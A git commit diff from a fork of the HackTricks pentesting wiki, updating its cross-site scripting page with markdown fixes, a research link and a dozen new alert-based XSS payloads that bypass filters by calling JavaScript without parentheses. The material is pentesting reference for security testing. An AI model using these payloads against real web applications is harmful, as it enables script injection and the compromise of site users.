coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [#3501] No subject

Browse Source
This commit is contained in:
CPol 2022-09-23 09:06:24 +00:00 committed by gitbook-bot
parent c6405d9dcc
commit fd7e8de8d4
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 16 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
pentesting-web/xss-cross-site-scripting/README.md
View File

@ -201,7 +201,7 @@ Some **examples**:
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_
_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_
In this case and if no black/whitelisting is used, you could use payloads like:
@ -595,12 +595,23 @@ eval(8680439..toString(30))(983801..toString(36))
**JavaScript without parentheses**
```javascript
````javascript
alert`1`
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
```
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
throw onerror=alert,1337
Function`x${'alert\x281337\x29'}x```
'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval}
valueOf=alert;window+''
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name
window.name='javascript:alert(1)'
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
````
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
@ -807,7 +818,7 @@ with(this)
### Obfuscation & Advanced Bypass
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) \*\*\*\*
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
@ -816,6 +827,7 @@ with(this)
* More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
* [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
```javascript
//Katana